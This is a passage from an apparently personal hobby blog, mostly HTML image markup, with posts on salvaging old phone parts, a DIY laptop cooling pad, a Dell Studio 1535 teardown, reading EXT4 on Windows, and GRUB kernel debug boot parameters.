<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhFEIiqnO_ryFDOiMfzYIJuVa42iBpzGRdXRrY3Z0aWqAqI5m5Is0IbPTkA69AKRM0JvrfM4ERG9l5LYuUhSnrTXq7KDgEXvjtFPc_8DKZC3GcvMAr6ds3U9n9pzYzXkUnks-5zwjSZxc/s1600/2013-01-31+19.33.12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhFEIiqnO_ryFDOiMfzYIJuVa42iBpzGRdXRrY3Z0aWqAqI5m5Is0IbPTkA69AKRM0JvrfM4ERG9l5LYuUhSnrTXq7KDgEXvjtFPc_8DKZC3GcvMAr6ds3U9n9pzYzXkUnks-5zwjSZxc/s200/2013-01-31+19.33.12.jpg" width="200" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i> Camera Lens with the light filter (Exposed camera film[Even Gradient])</i></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWtyFBRpbsKeoyJcG4uG8Fetm3hdNmGF8eMfaquUNe91MXgFm7prT4FpoKMHakU2WFblYM0AreM88tvlJqUvli0OsbbGWqSNAG1cuafNS-U1vmJpMDIbDJUKYHfNGShxjkVqcUuV88hRY/s1600/2013-01-31+19.32.22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWtyFBRpbsKeoyJcG4uG8Fetm3hdNmGF8eMfaquUNe91MXgFm7prT4FpoKMHakU2WFblYM0AreM88tvlJqUvli0OsbbGWqSNAG1cuafNS-U1vmJpMDIbDJUKYHfNGShxjkVqcUuV88hRY/s200/2013-01-31+19.32.22.jpg" width="200" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: x-small;"><i>Reassembled Module</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
Results in the next post.</div>
<div class="separator" style="clear: both; text-align: left;">
Update [1/2/2013]: Damn! The drivers are 32 bit. Let's see if Linux does the job.</div>
</div>
<b>WOL PACKET RECEIVED!</b> (2013-01-30)<div dir="ltr" style="text-align: left;" trbidi="on">
Ok, I know I keep disappearing... but I'm back.... had some tasks to complete ;-)</div>
<b>Old Cell Phones == treasure;</b> (2012-07-11)<div dir="ltr" style="text-align: left;" trbidi="on">
I guess many people don't realize, before dumping their old phones, that they are also throwing away a treasure trove of micro hardware that can be extracted and used in multiple DIY projects. I don't blame them, as most people don't even know how the vibration in their phones works.<br />
<br />
So recently, while going through some pre-2006 cellphones, I decided to salvage such components. I recovered some really neat gems:<br />
<ul style="text-align: left;">
<li>Micromotors [<i>Both types: External and Sealed</i>]</li>
<li>Mics</li>
<li>Speakers</li>
<li>2MP camera modules</li>
<li>LCDs [<i>Color 64K & 256K 160ppi & B/W 100ppi</i>]</li>
<li>Micro DC-in female jacks</li>
</ul>
Now to think of some things I could do with them!?? Bristlebots anyone ;-) </div>
<b>EXT4 filesystems on M$ Windows</b> (2012-07-07)<div dir="ltr" style="text-align: left;" trbidi="on">
A real pain that I had to go through was the inability to properly read EXT4 filesystems on Windows. My old solution was a standalone app called Ext2Read, but it was slow and a very dirty solution [<i>files had to be copied onto an NTFS filesystem first</i>]. <br />
<br />
What I desired was a simpler approach, and along came <a href="http://www.ext2fsd.com/" target="_blank"><b>Ext2Fsd</b></a>. This application allows the EXT4 partition to be mounted and read like a native NTFS volume. One caveat is that 'extent' support is still pending, so the interaction is limited to read-only, which I don't mind since my only need in Windows is to listen to music, which lives on the big and chunky EXT4 side.</div>

DIY cooling solution... [2012-07-07]<div dir="ltr" style="text-align: left;" trbidi="on">
I recently bought a new notebook, about 2 months ago [<i>my old machine was... well, old... it needed a well-deserved retirement. Goodbye ProcyonMk2, you ol' girl! </i>:-P]. <a href="http://in.asus.com/Notebooks/Versatile_Performance/K53SV/" target="_blank">ASUS K53</a> series; specs are:<br />
<br />
ProcyonMk3:<br />
15.6-inch WLED screen @ 1366x768<br />
<a href="http://ark.intel.com/products/53469/" target="_blank">Intel 2670QM CPU [<i>4 Core + HT = 8 Threads</i>]</a><br />
<a href="http://www.notebookcheck.net/NVIDIA-GeForce-GT-540M.41715.0.html" target="_blank">NVIDIA GT 540M GPU [<i>2GB DDR3 VRAM</i>]</a> <a href="http://www.notebookcheck.net/Nvidia-Optimus-Review.25467.0.html" target="_blank">[Optimus Solution]</a><br />
ASint 8GB DDR3 RAM<br />
<a href="http://www.wdc.com/global/products/specs/?driveID=815&language=1" target="_blank">WDC 5400RPM 750GB HDD</a><br />
USB2.0 x 2, USB3.0 x 1 <br />
Atheros b/g/n Wifi, Realtek Audio, BT3, Altec-Lansing Speakers, 6 Cell Battery.<br />
<br />
Basically a pretty powerful system. I wouldn't attach an ULTRA tag [<i>my way of rating notebooks: low, midrange, high, ultra</i>] to it, but would consider it to be a HIGH-end machine [<i>a first for me, since I am used to owning low to mid-range systems</i>]...<br />
<br />
Anyway, considering the heatwave that's been plaguing the area where I live, a decent cooling solution had to be designed, as my old cooling pad was busted with 2 of its fans burnt out.<br />
<br />
So basically I had this old but totally unused 12 volt 0.3 amp [<i>3.6 watt</i>] DC chassis fan lying around, which I had extracted from my desktop since the mobo didn't have a chassis fan socket. Using an old router adapter rated at 12 volts 0.7 amps DC [<i>No. 1 rule in Electrical Engineering: voltage should be the same, current should be equal or more</i>], laptop packaging and some nice nifty tools, I made my own DIY cooling pad.<br />
<br />
It turned out pretty good considering its simplicity.<br />
<br />
Pics attached [<i>I'm too lazy to take detailed photos; if you don't understand the design, then leave a comment and I could help you out</i>]:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2ZyG2rkXFSm9NBcRjl6YODODVN1EDvlqLfNTENR7F_fPRaLLDLRtwpS-WnLJBDu4UGcmBuPNgqHZ6M7JXvn86YiabvVBNhCfVzFSWD4L3xYLnmKC5F2eCXll3jLBkIwWTx9TeqQDOZHn/s1600/2012-07-07+20.02.58.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2ZyG2rkXFSm9NBcRjl6YODODVN1EDvlqLfNTENR7F_fPRaLLDLRtwpS-WnLJBDu4UGcmBuPNgqHZ6M7JXvn86YiabvVBNhCfVzFSWD4L3xYLnmKC5F2eCXll3jLBkIwWTx9TeqQDOZHn/s320/2012-07-07+20.02.58.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i>Pic 1: Underside.</i></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgoUEoD7m0NAbZtSF3FRUC2hO4sXtgJowSs9g3giARpPYAkop4poXL71TnPFOcC-6SQphpRR_IzrcqSSiHTWvq43Mjra5-O05JhRgCcl8Y4VYGWq1-tcvQpUWW8YoQbVdLfGKixZMkdsSl/s1600/2012-07-07+20.03.04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgoUEoD7m0NAbZtSF3FRUC2hO4sXtgJowSs9g3giARpPYAkop4poXL71TnPFOcC-6SQphpRR_IzrcqSSiHTWvq43Mjra5-O05JhRgCcl8Y4VYGWq1-tcvQpUWW8YoQbVdLfGKixZMkdsSl/s320/2012-07-07+20.03.04.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i>Pic 2: Upside.</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
End Result: Cool'n'Quiet system, 1 week's lunch money saved :-)<br />
<br />
<b>Update:</b> Since this is an internal desktop chassis fan, it has a high dB level; the bloody thing makes noise like a jet engine. Good thing my speakers damp it all out with music... ;-D</div>
</div>

Reanimated [2012-07-04]<div dir="ltr" style="text-align: left;" trbidi="on">
It's been like what... ages... since my last post... so many things have changed. I guess it's time I caught up and updated this blog... therefore I am officially reanimating this corner of the web.</div>

Japan Earthquake and Fukushima Daiichi Crisis [2011-03-16]<div dir="ltr" style="text-align: left;" trbidi="on">We are all well aware of the tragic earthquake and tsunami that caused massive damage and great loss of life to the Japanese coastal areas. Also, the situation seems very critical at the Fukushima Daiichi nuclear facility, where engineers are attempting their best to avert a possible meltdown. My prayers go out to all the people and their families affected, and I pray that they are successful in stabilizing the situation. Also, I salute all the people currently involved in the rescue and stabilization process. You are the real heroes, guys... </div>

Dell Studio 1535 cleaning/disassembly [2011-03-13]<div dir="ltr" style="text-align: left;" trbidi="on">The temperature sensors on procyon [My Dell Studio 1535] laptop were constantly hitting abnormal values recently. The CPU kept idling at around 60C, even with the lm_sensors configuration fix from my <a href="http://mmaptonull.blogspot.com/2011/02/lmsensors-and-tjunctionmax.html">previous post</a> applied. So I knew it was time I opened the girl up and did her some good ol' fashioned cleaning. So I borrowed a cam, took out my toolbox, acquired some Thermal Compound [Shin-Etsu Microsi's G-751 Thermal Paste (thanks Shray!)] from a good friend, added some Pink Floyd to my playlist and got to work. 
Here are a few pics of the internals for anyone's viewing pleasure since I could not find any decent teardown images of the same model on the web. Enjoy....<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWX7t1bCdzgwpbvT1MUKYf7ifocQsjJv8j2s1POoKI7Y9eJIHQuV5R8EKuNh85eD5bDGC8tUSrtwuyDzddVYGAUrAXS8oJYoudYS_iuToJOOjH9tLBs76Y5qNwjVrTo355070jhDoTdIom/s1600/IMGP2309.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWX7t1bCdzgwpbvT1MUKYf7ifocQsjJv8j2s1POoKI7Y9eJIHQuV5R8EKuNh85eD5bDGC8tUSrtwuyDzddVYGAUrAXS8oJYoudYS_iuToJOOjH9tLBs76Y5qNwjVrTo355070jhDoTdIom/s200/IMGP2309.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Backplate opened, Fan/Heat-sink assembly and processor removed</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCPi1cCScRP70IxWaIGgqGBhLRpHMiJQ3lsGen72ScdL4ahhuiWgR3QNWazt6S1tPFpU0Kn07lTfhOEjDFkOy5T-YgsyL_wN1Ns_ybaAqJym67AX5g4raOIdwnnexPFVyxO1D7v3tLbp-h/s1600/IMGP2310.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCPi1cCScRP70IxWaIGgqGBhLRpHMiJQ3lsGen72ScdL4ahhuiWgR3QNWazt6S1tPFpU0Kn07lTfhOEjDFkOy5T-YgsyL_wN1Ns_ybaAqJym67AX5g4raOIdwnnexPFVyxO1D7v3tLbp-h/s200/IMGP2310.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Close-up of the first image.</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rj4CUkT3w4bDuAVuUNObwD6dvDTjKeF-JjH9xANemZo6kogl8FKeT6fpXSaOyzUEx_5OuDhX5ku0xg10bpdMAlGsCAWT6ril4tkLoIQ-mkfYwmP9GkxhP2tB4v6Xh3yac67V2KRk3zaa/s1600/IMGP2306.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rj4CUkT3w4bDuAVuUNObwD6dvDTjKeF-JjH9xANemZo6kogl8FKeT6fpXSaOyzUEx_5OuDhX5ku0xg10bpdMAlGsCAWT6ril4tkLoIQ-mkfYwmP9GkxhP2tB4v6Xh3yac67V2KRk3zaa/s200/IMGP2306.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The processor[Top]: <a href="http://ark.intel.com/Product.aspx?id=33915">Intel T5750</a> [2GHz, Socket-P, 2MBL2, 667 FSB]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW1PWPeMuoUri41-pnxjZ_n6K3YxYAEPjOMEAqV1F5FJFdAFzUWPz1Glo5BWfCyeRe21ZGfNNan7KhNuqQnzrK7MPh_sFVX1xDK0iFa_THDuHoXLifb1XSF2u-1OHNu8wjxsMAdu119khS/s1600/IMGP2303.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW1PWPeMuoUri41-pnxjZ_n6K3YxYAEPjOMEAqV1F5FJFdAFzUWPz1Glo5BWfCyeRe21ZGfNNan7KhNuqQnzrK7MPh_sFVX1xDK0iFa_THDuHoXLifb1XSF2u-1OHNu8wjxsMAdu119khS/s200/IMGP2303.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The processor[Bottom]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMfLxDi9MqoeffIDINa1DaksjkFA7KLTBRR59y-1BWGDkpqHzZg9XK6lEBiUyQsioOm-gOVSx0k-jsXft7qpqqbqfhCwAsOM4PPUdtxnBXtQJ1idezQAiJcyKAqDO_Wf9u2-znc7kxSMpK/s1600/IMGP2307.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMfLxDi9MqoeffIDINa1DaksjkFA7KLTBRR59y-1BWGDkpqHzZg9XK6lEBiUyQsioOm-gOVSx0k-jsXft7qpqqbqfhCwAsOM4PPUdtxnBXtQJ1idezQAiJcyKAqDO_Wf9u2-znc7kxSMpK/s200/IMGP2307.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan/Heat-sink assembly [Top]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSrMol71X5DNoosXXXek5hyi1MJfbQR2Pz8bz-QyxbTup838vH8OLfpD8TGv0Iti_53T0JSv7iBbPI-GszakJdKxIixSfQgB6uwQmvOCFr1cOrI4O2C_B2z7qyTzmn39U-tkxzb7jAhi2/s1600/IMGP2308.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSrMol71X5DNoosXXXek5hyi1MJfbQR2Pz8bz-QyxbTup838vH8OLfpD8TGv0Iti_53T0JSv7iBbPI-GszakJdKxIixSfQgB6uwQmvOCFr1cOrI4O2C_B2z7qyTzmn39U-tkxzb7jAhi2/s200/IMGP2308.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan/Heat-sink assembly [Bottom] [Note the thermal pads for the MCH and GFX chips]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRpNPfyGB-jLyF7qMOuGoDJN3W5OpPL4CMyzfvNRobPfNahCdUnhVGnMc1rodGB8bMoqtEZGDWlQ_h1yMFKL1dgTaHYEDqxnkWyBbSVBcdL70-SkBUxLXux3HeM04z46Pm3IJwis5Qx8EB/s1600/IMGP2313.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRpNPfyGB-jLyF7qMOuGoDJN3W5OpPL4CMyzfvNRobPfNahCdUnhVGnMc1rodGB8bMoqtEZGDWlQ_h1yMFKL1dgTaHYEDqxnkWyBbSVBcdL70-SkBUxLXux3HeM04z46Pm3IJwis5Qx8EB/s200/IMGP2313.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> Fan/Heatsink assembly [Top, Fan Removed]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1gZ0auQWHIV8nXi0-4dlm9DQt99-FET3Ocy3c_ppg56jQRN22V-HcPnMDoV06cqxKhdpokikyJOTb2BJafXAtHmcsZ8oGzoeCgoacGtCbO6LGsAd3glXzxOROvPUbDu3YmFHCTKD5VeR9/s1600/IMGP2314.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1gZ0auQWHIV8nXi0-4dlm9DQt99-FET3Ocy3c_ppg56jQRN22V-HcPnMDoV06cqxKhdpokikyJOTb2BJafXAtHmcsZ8oGzoeCgoacGtCbO6LGsAd3glXzxOROvPUbDu3YmFHCTKD5VeR9/s200/IMGP2314.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> Fan/Heat-sink assembly [Bottom, Fan Removed]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdOGMUxUaKGdf7hv02oJyL44aP38rwPLYSonuy84h1h4x2vhbxGWV5nqSEn0icYE3fpJkEwOtU6K5QgU-J3noISP6SWY4Bs1QNJ2w6z0h50dyXCUg2YJd55PQrxp6Ls7zbc4B73JmCfmtd/s1600/IMGP2315.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdOGMUxUaKGdf7hv02oJyL44aP38rwPLYSonuy84h1h4x2vhbxGWV5nqSEn0icYE3fpJkEwOtU6K5QgU-J3noISP6SWY4Bs1QNJ2w6z0h50dyXCUg2YJd55PQrxp6Ls7zbc4B73JmCfmtd/s200/IMGP2315.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan(Dirty) [Top]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoPjXFYpw3AdJXW0unEz2ELhPorO4rueHW1zcFQheHTGbk49fkkR8ytyZRz_bBefPD3ZnKZCAD4bZmDu2Ii82-9TVIYcHbG5PheYXtnDqatWNf_RkvwBSJ7PfrtywEPOWOD8TLff6an9MU/s1600/IMGP2316.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoPjXFYpw3AdJXW0unEz2ELhPorO4rueHW1zcFQheHTGbk49fkkR8ytyZRz_bBefPD3ZnKZCAD4bZmDu2Ii82-9TVIYcHbG5PheYXtnDqatWNf_RkvwBSJ7PfrtywEPOWOD8TLff6an9MU/s200/IMGP2316.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan(Dirty) [Bottom]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheaZVqo_ZPGT1jMKihlNVmBF9i6aS7MKGcL7Z5xxL2PAg2M6b331GKdgyTtYLR7SuLcDHnIdl7oLRq5umC8YGBYxCVM8L608zHEffsTsVOMN23EkbjZjg11alk2y_rYcxwL-jnYfBOgXpF/s1600/IMGP2312.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheaZVqo_ZPGT1jMKihlNVmBF9i6aS7MKGcL7Z5xxL2PAg2M6b331GKdgyTtYLR7SuLcDHnIdl7oLRq5umC8YGBYxCVM8L608zHEffsTsVOMN23EkbjZjg11alk2y_rYcxwL-jnYfBOgXpF/s200/IMGP2312.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partially Cleaned Heat-sink Fins</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0PUcyPw-WLRfRcCEf3COPSBP2HKk0ywGAp09EylwwXLc0o1rccugeyToKFSUk3MOj1lekBB0a6VzXJdSiyy7wPhebSCi06jSa9RYrcwtSycEBeizghN7JgaCDkDRaU8yzkDOSawrlFSc/s1600/IMGP2318.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0PUcyPw-WLRfRcCEf3COPSBP2HKk0ywGAp09EylwwXLc0o1rccugeyToKFSUk3MOj1lekBB0a6VzXJdSiyy7wPhebSCi06jSa9RYrcwtSycEBeizghN7JgaCDkDRaU8yzkDOSawrlFSc/s200/IMGP2318.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">ATI Mobility Radeon HD3450 256MB [The 2 chips on the left are the 128MBx2(Samsung) RAMDACs]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi37FE2YEpDg5WWW8W868Ia7aGhZtDtWno9gNy07JJqC9lVhMni1nB7PkL9UEXpzFSJqpeBX-smUJzMyZaODuMaUgJnH2ksS142Lmfu-SIhLXx5TjnnJpIj2vs1SSrNAsTcVFYdStYKslC9/s1600/IMGP2322.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi37FE2YEpDg5WWW8W868Ia7aGhZtDtWno9gNy07JJqC9lVhMni1nB7PkL9UEXpzFSJqpeBX-smUJzMyZaODuMaUgJnH2ksS142Lmfu-SIhLXx5TjnnJpIj2vs1SSrNAsTcVFYdStYKslC9/s200/IMGP2322.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Intel 965PM <a href="http://en.wikipedia.org/wiki/Northbridge_%28computing%29">MCH</a></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAW9SDdJ8F7C0_6fLbT2fdkuQKVHgHKX_WWrVvFT7Pv95xI34i-df3cBH92akKXmncZG3diNrt3G_qe7EIe0yvfE-EPz054i2wxnH2lGTxwL-1HEWUnIfU86jb49MgJXqE5Y4xkv8s_0S/s1600/IMGP2323.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAW9SDdJ8F7C0_6fLbT2fdkuQKVHgHKX_WWrVvFT7Pv95xI34i-df3cBH92akKXmncZG3diNrt3G_qe7EIe0yvfE-EPz054i2wxnH2lGTxwL-1HEWUnIfU86jb49MgJXqE5Y4xkv8s_0S/s200/IMGP2323.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Intel MCH and The <a href="http://en.wikipedia.org/wiki/Socket_P">Socket-P</a> processor socket</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT781L5sIoB0MlT1TyQgkSNzk6WdahSo2ELDxplf_UsvVPBmEP9FCybjJozw99AdJ30Ng83Hool8XOJtvDiZ4rc6HKgLWByWCPZ5sJRljFwTo2Ptycw3hvUZHuXGpn9xrl8CWdiwpa7Iws/s1600/IMGP2328.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT781L5sIoB0MlT1TyQgkSNzk6WdahSo2ELDxplf_UsvVPBmEP9FCybjJozw99AdJ30Ng83Hool8XOJtvDiZ4rc6HKgLWByWCPZ5sJRljFwTo2Ptycw3hvUZHuXGpn9xrl8CWdiwpa7Iws/s200/IMGP2328.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The WPAN and WLAN[<a href="http://www.broadcom.com/products/Wireless-LAN/802.11-Wireless-LAN-Solutions/BCM4312">Broadcom BCM4312</a>] cards.</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ1GVSFwexjyhnbcWAWFmYeks2Eky1Mw16ZmXgJsH1gNtTLMPxy6CiKo3p0B3Y1b3AjWF_ErveCKar9EF5ikflMfwHAmbNBcmssgPt0TFwFrvyaQSSMnkGYCGlft23IW4wfTgUUkDbH5xA/s1600/IMGP2330.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ1GVSFwexjyhnbcWAWFmYeks2Eky1Mw16ZmXgJsH1gNtTLMPxy6CiKo3p0B3Y1b3AjWF_ErveCKar9EF5ikflMfwHAmbNBcmssgPt0TFwFrvyaQSSMnkGYCGlft23IW4wfTgUUkDbH5xA/s200/IMGP2330.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Nanya 1GB DDR2 PC2-5300 @ 333 MHz x2 RAM Cards</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj72DHsrsS06HSumCU94BiBEqeOnrjRJAH3Z3fYyG9L3wn9D_v_y0adWkikBKlQtikgCLk0cpXs9IJcI2Z1O2Ydjnm534ZQytP7DofXHgU4JPMvt3hWgLdE3x7b_i00Ks5tsatQJhDw5KmZ/s1600/IMGP2331.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj72DHsrsS06HSumCU94BiBEqeOnrjRJAH3Z3fYyG9L3wn9D_v_y0adWkikBKlQtikgCLk0cpXs9IJcI2Z1O2Ydjnm534ZQytP7DofXHgU4JPMvt3hWgLdE3x7b_i00Ks5tsatQJhDw5KmZ/s200/IMGP2331.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The HDD [<a href="http://www.wdc.com/global/products/specs/?driveID=802&language=1">Western Digital WD3200BPVT</a>] and The DVD drive</td></tr>
</tbody></table><div style="text-align: left;">After a thorough cleaning and application of new thermal grease, the temps have dropped significantly, by at least ~10C.</div><div style="text-align: left;"><br />
</div><div style="text-align: left;">End result: a cool and quiet system and a wholly satisfied conscience :)</div></div>

detailed kernel bootup debug messages [2011-03-06]<div dir="ltr" style="text-align: left;" trbidi="on">Users like me prefer as much debugging output from applications as possible, because it makes performance and stability issues easier to understand. It also shows what is going on behind the scenes when debugging a crash. A few additions to the boot parameters of a Linux kernel give detailed messages and verbose output:<br />
<br />
By modifying the 'kernel' line in GRUB, or editing the relevant boot file under /boot/grub, and adding the following [in <b>bold</b>]:<br />
<br />
<blockquote>kernel /boot/vmlinuz26 root=/dev/disk/by-label/Arch ro <b>debug ignore_loglevel log_buf_len=10M print_fatal_signals=1 LOGLEVEL=8 earlyprintk=vga,keep sched_debug</b></blockquote>heavy debugging can be easily activated.<br />
<br />
<b>debug</b> = activates internal debugging.<br />
<b>ignore_loglevel</b> = ignores any sort of log level and maximizes debug output.<br />
<b>log_buf_len</b> = increases the log buffer length to 10 MiB<br />
<b>print_fatal_signals</b> = print any fatal signals.<br />
